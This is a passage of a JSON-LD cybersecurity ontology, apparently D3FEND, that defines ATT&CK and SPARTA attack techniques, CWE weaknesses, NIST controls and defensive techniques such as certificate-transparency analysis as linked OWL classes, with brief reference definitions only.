      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:N2194451287b3468ea1392870504c175e"
        }
      ]
    },
    {
      "@id": "_:N2194451287b3468ea1392870504c175e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CWE-1263",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1263",
      "d3f:definition": "The product is designed with access restricted to certain information, but it does not sufficiently protect against an unauthorized actor with physical access to these areas.",
      "rdfs:label": "Improper Physical Access Control",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:T1494",
      "@type": "owl:Class",
      "d3f:attack-id": "T1494",
      "d3f:definition": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1565.003",
      "rdfs:label": "Runtime Data Manipulation",
      "rdfs:seeAlso": {
        "@id": "d3f:T1565.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:may-modify",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-modify y: The entity x may modify the thing y; that is, 'x modifies y' may be true.",
      "rdfs:label": "may-modify",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:CCI-002145_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces organization-defined circumstances and/or usage conditions for organization-defined information system accounts.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002145"
    },
    {
      "@id": "d3f:T1133",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1133",
      "d3f:definition": "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)",
      "d3f:produces": [
        {
          "@id": "d3f:Authentication"
        },
        {
          "@id": "d3f:Authorization"
        },
        {
          "@id": "d3f:NetworkSession"
        }
      ],
      "rdfs:label": "External Remote Services",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InitialAccessTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "_:Nc7e0e562f0df4979b0c30c3986684104"
        },
        {
          "@id": "_:N111fabf574ab4044ba5c928eb79ed9bb"
        },
        {
          "@id": "_:Nf83ced6eebcb462bb3ee9c6e3cb855d9"
        }
      ]
    },
    {
      "@id": "_:Nc7e0e562f0df4979b0c30c3986684104",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "_:N111fabf574ab4044ba5c928eb79ed9bb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authorization"
      }
    },
    {
      "@id": "_:Nf83ced6eebcb462bb3ee9c6e3cb855d9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkSession"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_CM-5_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Restrictions for Change | Automated Access Enforcement and Audit Records",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "rdfs:label": "CM-5(1)"
    },
    {
      "@id": "d3f:Semi-supervisedCluster-then-label",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSCTL",
      "d3f:definition": "Pre-training methods are aimed to guide the parameters of a network towards interesting regions in model space using unlabeled data, before fine-tuning the parameters with the labeled data.",
      "d3f:kb-article": "## References\nJashish Shrestha. (n.d.). Beginner's Guide to Semi-Supervised Learning. [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/)",
      "rdfs:label": "Semi-supervised Cluster-then-label",
      "rdfs:subClassOf": {
        "@id": "d3f:UnsupervisedPreprocessing"
      }
    },
    {
      "@id": "d3f:DE-0002.02",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0002.02",
      "d3f:definition": "Threat actors may overwhelm/jam the downlink signal to prevent transmitted telemetry signals from reaching their destination without severe modification/interference, effectively leaving ground controllers unaware of vehicle activity during this time. Telemetry is the only method in which ground controllers can monitor the health and stability of the spacecraft while in orbit. By disabling this downlink, threat actors may be able to stop mitigations from taking place.",
      "rdfs:label": "Jam Link Signal - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0002/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0002"
      },
      "skos:prefLabel": "Jam Link Signal"
    },
    {
      "@id": "d3f:Reference-DeterministicMethodForDetectingAndBlockingOfExploitsOnInterpretedCode_K2CyberSecurityInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190180036A1/en?oq=US-2019180036-A1"
      },
      "d3f:kb-abstract": "In one aspect, a method useful for preventing exploitation of a vulnerability in an interpreted code by monitoring and validating an execution of the interpreted code in a script file by an application server, includes the step of generating a mapping for an incoming network connection to a specified script file to be executed by an application server. The computerized method includes the step of inserting a hook for monitoring an application programming interface (API) call or a privileged instruction executed by the application server. The computerized method includes the step of inserting a validation code configured to validate the API call or the privileged instruction executed by the interpreted code in a script.",
      "d3f:kb-author": "Jayant Shukla",
      "d3f:kb-mitre-analysis": "This patent describes a technique for monitoring API calls. During execution of interpreted code the observed API calls are validated against a whitelist of API calls for that interpreted code file. Action is taken if the observed API call is not in accordance with the list.",
      "d3f:kb-organization": "K2 Cyber Security Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallAnalysis"
      },
      "d3f:kb-reference-title": "Deterministic method for detecting and blocking of exploits on interpreted code",
      "rdfs:label": "Reference - Deterministic method for detecting and blocking of exploits on interpreted code - K2 Cyber Security Inc"
    },
    {
      "@id": "d3f:HTTPDeleteEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the HTTP DELETE method is used to delete the specified resource.",
      "rdfs:label": "HTTP DELETE Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HTTPRequestEvent"
      }
    },
    {
      "@id": "d3f:T1604",
      "@type": "owl:Class",
      "d3f:attack-id": "T1604",
      "d3f:definition": "Adversaries may use a compromised device as a proxy server to the Internet. By utilizing a proxy, adversaries hide the true IP address of their C2 server and associated infrastructure from the destination of the network traffic. This masquerades an adversary’s traffic as legitimate traffic originating from the compromised device, which can evade IP-based restrictions and alerts on certain services, such as bank accounts and social media websites.(Citation: Threat Fabric Exobot)",
      "rdfs:label": "Proxy Through Victim - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Proxy Through Victim"
    },
    {
      "@id": "d3f:T1021.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1021.005",
      "d3f:definition": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)",
      "rdfs:label": "VNC",
      "rdfs:subClassOf": {
        "@id": "d3f:T1021"
      }
    },
    {
      "@id": "d3f:REC-0001.05",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001.05",
      "d3f:definition": "Adversaries seek a working map of the thermal architecture and its operating envelopes to anticipate stress points and plan timing for other techniques. Valuable details include passive elements (MLI, coatings, radiators, heat pipes/straps, louvers) and active control (survival and control heaters, thermostats, pumped loops), plus sensor placement, setpoints, deadbands, heater priority tables, and autonomy rules that protect critical hardware during eclipses and anomalies. Artifacts often come from thermal math models (TMMs), TVAC test reports, heater maps and harness drawings, command mnemonics, and on-orbit thermal balance procedures. When correlated with attitude constraints, payload duty cycles, and power budgets, this information lets a threat actor infer when components run close to limits, how safing responds to off-nominal gradients, and where power-thermal couplings can be exploited. Even small fragments, such as louver hysteresis or a heater override used for decontamination, can reveal opportunities to mask heating signatures or provoke nuisance safing.",
      "rdfs:label": "Thermal Control System - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/05/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0001"
      },
      "skos:prefLabel": "Thermal Control System"
    },
    {
      "@id": "d3f:modified-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x modified-by y: The entity x is changed by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:modifies"
      },
      "rdfs:label": "modified-by",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-be-modified-by"
        }
      ]
    },
    {
      "@id": "d3f:CWE-96",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-96",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before inserting the input into an executable resource, such as a library, configuration file, or template.",
      "rdfs:label": "Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-94"
      }
    },
    {
      "@id": "d3f:CWE-313",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-313",
      "d3f:definition": "The product stores sensitive information in cleartext in a file, or on disk.",
      "rdfs:label": "Cleartext Storage in a File or on Disk",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-312"
      }
    },
    {
      "@id": "d3f:T1584.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1584.007",
      "d3f:definition": "Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.",
      "rdfs:label": "Serverless",
      "rdfs:subClassOf": {
        "@id": "d3f:T1584"
      }
    },
    {
      "@id": "d3f:T1181",
      "@type": "owl:Class",
      "d3f:attack-id": "T1181",
      "d3f:definition": "Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data). (Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of extra window memory (EWM) to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1055.011",
      "rdfs:label": "Extra Window Memory Injection",
      "rdfs:seeAlso": {
        "@id": "d3f:T1055.011"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:FTPDeleteEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where files or directories are removed from an FTP server, resulting in their permanent deletion from the remote system.",
      "rdfs:label": "FTP Delete Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FTPEvent"
        },
        {
          "@id": "_:N2c760dbef5e74765a71319f59b952401"
        }
      ]
    },
    {
      "@id": "_:N2c760dbef5e74765a71319f59b952401",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FTPPutEvent"
      }
    },
    {
      "@id": "d3f:CWE-198",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-198",
      "d3f:definition": "The product receives input from an upstream component, but it does not account for byte ordering (e.g. big-endian and little-endian) when processing the input, causing an incorrect number or value to be used.",
      "rdfs:label": "Use of Incorrect Byte Ordering",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-188"
      }
    },
    {
      "@id": "d3f:AssociationRuleLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ARL",
      "d3f:definition": "Association rule learning is a rule-based machine learning method for discovering interesting relations between variables in large databases.",
      "d3f:kb-article": "## References\nAssociation rule learning. (n.d.). Wikipedia. [Link](https://en.wikipedia.org/wiki/Association_rule_learning)",
      "rdfs:label": "Association Rule Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:UnsupervisedLearning"
      }
    },
    {
      "@id": "d3f:T1608.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1608.006",
      "d3f:definition": "Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)",
      "rdfs:label": "SEO Poisoning",
      "rdfs:subClassOf": {
        "@id": "d3f:T1608"
      }
    },
    {
      "@id": "d3f:EncryptedPassword",
      "@type": "owl:Class",
      "d3f:definition": "A password that is encrypted.",
      "rdfs:label": "Encrypted Password",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EncryptedCredential"
        },
        {
          "@id": "d3f:Password"
        }
      ]
    },
    {
      "@id": "d3f:T1510",
      "@type": "owl:Class",
      "d3f:attack-id": "T1510",
      "d3f:definition": "Adversaries may abuse clipboard functionality to intercept and replace information in the Android device clipboard.(Citation: ESET Clipboard Modification February 2019)(Citation: Welivesecurity Clipboard Modification February 2019)(Citation: Syracuse Clipboard Modification 2014) Malicious applications may monitor the clipboard activity through the <code>ClipboardManager.OnPrimaryClipChangedListener</code> interface on Android to determine when the clipboard contents have changed.(Citation: Dr.Webb Clipboard Modification origin2 August 2018)(Citation: Dr.Webb Clipboard Modification origin August 2018) Listening to clipboard activity, reading the clipboard contents, and modifying the clipboard contents requires no explicit application permissions and can be performed by applications running in the background, however, this behavior has changed with the release of Android 10.(Citation: Android 10 Privacy Changes)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1641.001",
      "rdfs:label": "Clipboard Modification - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1641.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Clipboard Modification"
    },
    {
      "@id": "d3f:T0813",
      "@type": "owl:Class",
      "d3f:attack-id": "T0813",
      "d3f:definition": "Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)",
      "rdfs:label": "Denial of Control - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Denial of Control"
    },
    {
      "@id": "d3f:T1642",
      "@type": "owl:Class",
      "d3f:attack-id": "T1642",
      "d3f:definition": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users.",
      "rdfs:label": "Endpoint Denial of Service - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Endpoint Denial of Service"
    },
    {
      "@id": "d3f:PassiveCertificateAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PassiveCertificateAnalysis"
      ],
      "d3f:d3fend-id": "D3-PCA",
      "d3f:definition": "Collecting host certificates from network traffic or other passive sources like a certificate transparency log and analyzing them for unauthorized activity.",
      "d3f:kb-article": "## How it works\nCertificates are analyzed outside of a TLS server connection using third-party secure update logs, domain name analysis and analytics.\n\n### Secure update certificate logs\n* Certificate Logs\nThe key enabling feature is a secure service that maintains record logs of certificate activities. The logs allow users to only append certificates and never to delete or modify the log entries. The logs use Merkle Tree Hashes to ensure they have not been tampered with. The logging service also allows for public auditing by any user.\n\nThe logging service, upon receipt of a certificate to log, will respond with a signed certificate timestamp (SCT). The SCT guarantees the certificate will be added to the log within the time specified. The SCT must be present with the certificate during a TLS handshake.\n\n* Certificate Monitoring\nCertificate monitoring of the logs is typically done by the CA, which watches for suspicious certificate logging and unusual certificates, extensions or permissions. Monitors are also responsible for verifying the logs are accurate and public.\n\n* Certificate Auditors\nLog integrity is verified by log auditors. Auditors use log proofs to validate that the cryptographic hashes (Merkle Trees) the log employs are consistent. To ensure consistency across multiple monitors and auditors sharing a common logging service, a gossip protocol is employed.\n\n### Phishing domain name analysis\n* A curated corpus of known benign domains and phishing domain names is used as training text for machine learning. Through the use of feature set extraction, vector labels are created with scoring to indicate whether they are considered benign or phishing domains.\n\n* A stream of new or updated SSL certificates with fully qualified domain names (FQDN) is analyzed against the feature vectors and a predictive model determines a score for the domains. The scoring considers distance measures such as Levenshtein distance to help in determining the final label score. Supervised learning is also employed using the curated corpus of benign and phishing domains.\n\n* Subdomain phishing analysis, prepending a trusted domain to a phishing domain, and regular expression comparisons are also used in the label scoring model. A tunable measure is used to determine the threshold for alerting. This measure helps to balance between precision and recall measures.\n\n## Considerations\n* Some entity will need to run the logging service and a trusted entity is preferred.\n* Certificate Authorities will likely need to monitor the logging service for consistency.\n* Certificate revocation is unchanged and remains outside of Certificate Transparency, but certificates needing to be revoked are visible.\n* The technique depends on a reliable feed of new and updated certificates.\n* Some certificate authorities allow for certificates to be registered with wildcards in the FQDN and thus will fail some of the subdomain scoring.\n* Phishing domains served only over plain HTTP will not be discovered, because they present no certificate to analyze.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CertificateTransparency"
        },
        {
          "@id": "d3f:Reference-StreamingPhish"
        }
      ],
      "rdfs:label": "Passive Certificate Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:CertificateAnalysis"
      }
    },
    {
      "@id": "d3f:Reference-CManualPointerArithmetic_GNU",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.gnu.org/software/c-intro-and-ref/manual/html_node/Pointer-Arithmetic.html"
      },
      "d3f:kb-organization": "GNU",
      "d3f:kb-reference-of": {
        "@id": "d3f:MemoryBlockStartValidation"
      },
      "d3f:kb-reference-title": "Pointer Arithmetic in C",
      "rdfs:label": "Reference - Memory Block Start Validation - GNU C Manual"
    },
    {
      "@id": "d3f:FileFooterBlock",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A section at the end of a file that contains metadata or control information.",
      "rdfs:label": "File Footer Block",
      "rdfs:subClassOf": {
        "@id": "d3f:FileSection"
      }
    },
    {
      "@id": "d3f:T1222.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1222.002",
      "d3f:definition": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).",
      "rdfs:label": "Linux and Mac File and Directory Permissions Modification",
      "rdfs:subClassOf": {
        "@id": "d3f:T1222"
      }
    },
    {
      "@id": "d3f:ServiceRestartEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event describing the sequential stopping and starting of a service application to refresh its state, apply updates, or resolve operational issues.",
      "rdfs:label": "Service Restart Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationRestartEvent"
        },
        {
          "@id": "d3f:ServiceEvent"
        },
        {
          "@id": "_:Nd8f7b32e2bb045cfbef243bf1e52ac4d"
        },
        {
          "@id": "_:Nf71bdf48317a40aab7e8f826430cbe19"
        }
      ]
    },
    {
      "@id": "_:Nd8f7b32e2bb045cfbef243bf1e52ac4d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceStopEvent"
      }
    },
    {
      "@id": "_:Nf71bdf48317a40aab7e8f826430cbe19",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceStartEvent"
      }
    },
    {
      "@id": "d3f:ATTACKMobileCredentialAccessTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0031"
      },
      "rdfs:label": "Credential Access Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:N920742475f064ce181e6d3adcf90901e"
        }
      ],
      "skos:prefLabel": "Credential Access Technique"
    },
    {
      "@id": "_:N920742475f064ce181e6d3adcf90901e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0031"
      }
    },
    {
      "@id": "d3f:T1558",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1558",
      "d3f:definition": "Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.",
      "d3f:may-access": {
        "@id": "d3f:KerberosTicket"
      },
      "d3f:may-create": {
        "@id": "d3f:KerberosTicket"
      },
      "rdfs:label": "Steal or Forge Kerberos Tickets",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:Na3d973f833ad4e35b2a1b1d1ae9ad1a1"
        },
        {
          "@id": "_:N7cbcb8cda0b24fd3a4377752ced2c5cd"
        }
      ]
    },
    {
      "@id": "_:Na3d973f833ad4e35b2a1b1d1ae9ad1a1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KerberosTicket"
      }
    },
    {
      "@id": "_:N7cbcb8cda0b24fd3a4377752ced2c5cd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KerberosTicket"
      }
    },
    {
      "@id": "d3f:T1218.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1218.002",
      "d3f:definition": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:may-modify": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Control Panel",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1218"
        },
        {
          "@id": "_:Nc22740f6551c4c21956b8e456064bec0"
        },
        {
          "@id": "_:N0585126bd75e48a3879faa85f9395a82"
        }
      ]
    },
    {
      "@id": "_:Nc22740f6551c4c21956b8e456064bec0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N0585126bd75e48a3879faa85f9395a82",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:CWE-1115",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1115",
      "d3f:definition": "The source code contains elements such as source files that do not consistently provide a prologue or header that has been standardized for the project.",
      "rdfs:label": "Source Code Element without Standard Prologue",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:process-environmental-variables",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x process-environmental-variables y: The process x has the process environmental variables data y.",
      "rdfs:label": "process-environmental-variables",
      "rdfs:subPropertyOf": {
        "@id": "d3f:process-data-property"
      },
      "skos:altLabel": "process-environmental-variable"
    },
    {
      "@id": "d3f:BitmapImageFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:BitmapImage"
      },
      "d3f:definition": "A file that contains graphics data represented in a bitmap.",
      "rdfs:label": "Bitmap Image File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ImageFile"
        },
        {
          "@id": "_:N512197e5f8454d49ac16248ac872aa82"
        }
      ]
    },
    {
      "@id": "_:N512197e5f8454d49ac16248ac872aa82",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BitmapImage"
      }
    },
    {
      "@id": "d3f:T1110.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Password"
      },
      "d3f:attack-id": "T1110.001",
      "d3f:definition": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.",
      "d3f:modifies": {
        "@id": "d3f:AuthenticationLog"
      },
      "d3f:produces": {
        "@id": "d3f:Authentication"
      },
      "rdfs:label": "Password Guessing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1110"
        },
        {
          "@id": "_:N17ef02ac187c44a2ae0eb699d80a70c5"
        },
        {
          "@id": "_:N0817cf7081264a599fd1dd95e5ed4d2a"
        },
        {
          "@id": "_:N8e2d12cb9fcf4b5eb1b2c2bd9288f184"
        }
      ]
    },
    {
      "@id": "_:N17ef02ac187c44a2ae0eb699d80a70c5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "_:N0817cf7081264a599fd1dd95e5ed4d2a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationLog"
      }
    },
    {
      "@id": "_:N8e2d12cb9fcf4b5eb1b2c2bd9288f184",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "d3f:DisplayDeviceDriver",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A device driver for a display adapter.",
      "d3f:drives": {
        "@id": "d3f:DisplayAdapter"
      },
      "rdfs:label": "Display Device Driver",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Device_driver"
        },
        {
          "@id": "dbr:Display_adapter"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDriver"
        },
        {
          "@id": "_:N2d4ab841c0414f97afc8236787136cb4"
        }
      ]
    },
    {
      "@id": "_:N2d4ab841c0414f97afc8236787136cb4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:drives"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DisplayAdapter"
      }
    },
    {
      "@id": "d3f:Software-definedRadioWaveformConfigurationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An SDR event where the waveform application's operational parameters have been applied and validated (e.g., sample rate, bandwidth, channel selection, framing/modulation options), placing the waveform in a state ready to run.",
      "rdfs:label": "Software-defined Radio Waveform Application Configuration Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Software-definedRadioEvent"
        },
        {
          "@id": "_:N9e51dc3b268447f6bd88fe80a797b170"
        },
        {
          "@id": "_:Nda10afb67f8e4d309e1204f6b7c64810"
        }
      ]
    },
    {
      "@id": "_:N9e51dc3b268447f6bd88fe80a797b170",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioComputer"
      }
    },
    {
